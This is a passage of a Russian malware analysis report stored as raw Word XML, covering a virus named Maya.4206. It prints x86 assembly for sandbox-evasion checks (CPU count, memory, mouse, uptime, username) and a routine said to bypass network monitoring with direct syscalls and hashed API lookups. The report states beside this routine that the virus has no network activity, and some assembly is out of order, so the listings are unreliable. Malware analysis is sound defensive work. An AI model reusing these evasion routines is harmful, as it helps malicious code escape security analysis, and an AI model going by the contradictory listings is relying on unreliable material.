    <w:p w14:paraId="0A674F13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mov     eax, [esp+0x14]        ; dwNumberOfProcessors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38514B11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cmp     eax, 2                 ; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Песочницы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часто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имеют</w:t>
      </w:r>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1 CPU</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B9A9BD" w14:textId="77777777" w:rsidR="00457074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 xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>jb      sandbox_detected</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB173FA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34BB202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; 2. Проверка размера памяти</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09CC5175" w14:textId="77777777" w:rsidR="00457074" w:rsidRPr="00457074" w:rsidRDefault="00457074" w:rsidP="00457074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457074">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>call    dword ptr [GlobalMemoryStatusEx_ptr]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5DA335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mov     eax, [esp+0x08]        ; ullTotalPhys (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>размер</w:t>
      </w:r>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> RAM)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694B20D0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cmp     eax, 0x40000000        ; 1GB </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>минимум</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0236AF72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jb      sandbox_detected</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F560C4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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8DE319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; 3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Проверка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наличия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мыши</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744E00C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call    dword ptr [GetSystemMetrics_ptr]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F80A08E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push    SM_MOUSEPRESENT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349C4A1E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call    dword ptr [GetSystemMetrics_ptr]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD43557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test    eax, eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0F3FA4" w14:textId="77777777" w:rsidR="00457074" w:rsidRPr="00BA7C8D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jz</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA7C8D">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>sandbox</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA7C8D">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>detected</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA7C8D">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">       ; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>В</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA7C8D">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>песочнице</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA7C8D">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>часто</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA7C8D">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>нет</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA7C8D">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>мыши</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66096C4A" w14:textId="77777777" w:rsidR="00457074" w:rsidRPr="00BA7C8D" w:rsidRDefault="00457074" w:rsidP="00457074">
      <w:pPr>
        <w:pStyle w:val="afc"/>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA7C8D">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="128C3A70" w14:textId="77777777" w:rsidR="00457074" w:rsidRDefault="00457074" w:rsidP="00457074">
      <w:pPr>
        <w:pStyle w:val="afc"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA7C8D">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>; 4. Проверка времени работы системы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28AA8F37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call    dword ptr [GetTickCount_ptr]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3244F11F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cmp     eax, 0x1E8480          ; 2,000,000 мс = ~33 минуты</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E2F85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jb      sandbox_detected       ; Песочницы часто только что запущены</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335D354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19D10C28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; 5. Проверка имени пользователя</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03CC1295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lea     eax, [ebp-0x100]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F18C82" w14:textId="77777777" w:rsidR="00457074" w:rsidRPr="00457074" w:rsidRDefault="00457074" w:rsidP="00457074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457074">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>push    0x100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA841C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push    eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F02E02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call    dword ptr [GetUserNameA_ptr]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5921DDD7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push    offset sandbox_users   ; "sandbox", "malware", "test"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03485627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push    eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091DCFDE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call    dword ptr [lstrcmpiA_ptr]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57BC25E1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test    eax, eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68061C57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jz      sandbox_detected</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7A30F0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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B4404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jmp     no_sandbox</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1512BC83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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD6A378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sandbox_detected:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6749D6B5" w14:textId="77777777" w:rsidR="00457074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 xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>; Выход без выполнения вредоносных действий</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BECCBA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push    0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C0AF6C" w14:textId="77777777" w:rsidR="00457074" w:rsidRPr="00457074" w:rsidRDefault="00457074" w:rsidP="00457074">
      <w:pPr>
        <w:pStyle w:val="afc"/>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>call    dword ptr [ExitProcess_ptr]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B169062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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BADEABF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>no_sandbox:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A139800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leave</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9D9E2C" w14:textId="1CBB0015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ret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C228D0D" w14:textId="77777777" w:rsidR="00457074" w:rsidRPr="00457074" w:rsidRDefault="00457074" w:rsidP="00457074">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>ДОКАЗАТЕЛЬСТВО</w:t>
      </w:r>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048A23C3" w14:textId="77777777" w:rsidR="00457074" w:rsidRPr="00457074" w:rsidRDefault="00457074" w:rsidP="00457074">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>В</w:t>
      </w:r>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Process Monitor </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>видны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вызовы</w:t>
      </w:r>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> GetSystemInfo, GlobalMemoryStatusEx,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428AA304" w14:textId="77777777" w:rsidR="00457074" w:rsidRPr="00457074" w:rsidRDefault="00457074" w:rsidP="00457074">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  GetSystemMetrics, GetUserNameA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9CAC9D" w14:textId="77777777" w:rsidR="00457074" w:rsidRPr="00457074" w:rsidRDefault="00457074" w:rsidP="00457074">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>В</w:t>
      </w:r>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> lst </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>файле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функция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помечена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как</w:t>
      </w:r>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> "SandboxEvasion"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D83543" w14:textId="7AA36C84" w:rsidR="00457074" w:rsidRDefault="00457074" w:rsidP="00457074">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>- При запуске в виртуальной машине с 1 CPU вирус завершается без действий</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D0C630" w14:textId="6663BA8E" w:rsidR="00457074" w:rsidRDefault="00457074" w:rsidP="00457074">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc215414036"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Сетевая активность</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="7B67129F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Вирус НЕ выполняет сетевых операций. Он не:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C424D41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Устанавливает сетевые подключения</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569A9B3E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Отправляет данные на C&amp;C серверы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03FD2C36" w14:textId="7904F7A2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Загружает дополнительные модули</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712653A4" w14:textId="33EF2902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ДОКАЗАТЕЛЬСТВО: В файле Virus.Win32.Maya.4206.lst нет импортов сетевых функций</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>(WinSock API, WinInet API). Вирус работает только локально.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391C69B8" w14:textId="77777777" w:rsidR="00457074" w:rsidRPr="00C26132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>hide</w:t>
      </w:r>
      <w:r w:rsidRPr="00C26132">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>network</w:t>
      </w:r>
      <w:r w:rsidRPr="00C26132">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>activity</w:t>
      </w:r>
      <w:r w:rsidRPr="00C26132">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12109CA0" w14:textId="77777777" w:rsidR="00457074" w:rsidRPr="00C26132" w:rsidRDefault="00457074" w:rsidP="00457074">
      <w:pPr>
        <w:pStyle w:val="afc"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C26132">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>push</w:t>
      </w:r>
      <w:r w:rsidRPr="00C26132">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>ebp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2255655E" w14:textId="77777777" w:rsidR="00457074" w:rsidRPr="00C26132" w:rsidRDefault="00457074" w:rsidP="00457074">
      <w:pPr>
        <w:pStyle w:val="afc"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C26132">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>mov</w:t>
      </w:r>
      <w:r w:rsidRPr="00C26132">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>ebp</w:t>
      </w:r>
      <w:r w:rsidRPr="00C26132">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>esp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411E8650" w14:textId="77777777" w:rsidR="00457074" w:rsidRPr="00C26132" w:rsidRDefault="00457074" w:rsidP="00457074">
      <w:pPr>
        <w:pStyle w:val="afc"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C26132">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B13899F" w14:textId="77777777" w:rsidR="00457074" w:rsidRDefault="00457074" w:rsidP="00457074">
      <w:pPr>
        <w:pStyle w:val="afc"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C26132">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>; Использование прямых вызовов syscall вместо API</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47937B7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; Это обходит хуки на сетевые API</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF3805A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3B9008E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; 1. Загрузка ntdll.dll напрямую</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB1C09D" w14:textId="77777777" w:rsidR="00457074" w:rsidRPr="00BA7C8D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  <w:r w:rsidRPr="00C26132">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>push</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA7C8D">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00C26132">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>offset</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA7C8D">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C26132">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>ntdll</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA7C8D">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="00C26132">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA7C8D">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">     ; "</w:t>
      </w:r>
      <w:r w:rsidRPr="00C26132">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>ntdll</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA7C8D">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C26132">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>dll</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA7C8D">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0136F9D7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BA7C8D">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>call    dword ptr [LoadLibraryA_ptr]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351B666D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mov     [ebp-0x04], eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77353BB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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5040B1D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; 2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Получение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457074">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> NtCreateFile </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>через</w:t>
      </w:r>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> EAT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF33296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push    0x0A3F5C5E            ; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Хеш</w:t>
      </w:r>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> "NtCreateFile"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E88825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push    eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BBBE39D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call    find_function_by_hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4217AE5D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mov     [ebp-0x08], eax       ; NtCreateFile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218905B2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    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AC4453" w14:textId="77777777" w:rsidR="00457074" w:rsidRPr="00BA7C8D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 xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA7C8D">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">; 3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Использование</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA7C8D">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C26132">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>raw</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA7C8D">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C26132">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>socket</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA7C8D">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>вместо</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA7C8D">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C26132">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>WinSock</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA7C8D">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C26132">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC5E2A5" w14:textId="77777777" w:rsidR="00457074" w:rsidRDefault="00457074" w:rsidP="00457074">
      <w:pPr>
        <w:pStyle w:val="afc"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA7C8D">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>; Это обходит мониторинг сетевой активности</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41949A26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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CEA8535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leave</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11081C2D" w14:textId="6CBB86E2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ret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC68990" w14:textId="08136FFA" w:rsidR="00457074" w:rsidRDefault="00457074" w:rsidP="00457074">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc215414037"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Удаление следов</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="4E31E5E4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Вирус НЕ удаляет следы своей деятельности. Он:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4D403B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Не удаляет временные файлы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA60090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Не очищает журналы событий</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347041CC" w14:textId="77777777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- Не удаляет ключи реестра после использования</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5198EC66" w14:textId="77777777" w:rsidR="00457074" w:rsidRPr="00457074" w:rsidRDefault="00457074" w:rsidP="00457074">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="736C8AA2" w14:textId="06696986" w:rsidR="00457074" w:rsidRPr="00457074" w:rsidRDefault="00457074" w:rsidP="00457074">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>ДОКАЗАТЕЛЬСТВО И АНАЛИЗ: В файле Virus.Win32.Maya.4206.lst нет вызовов функций</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
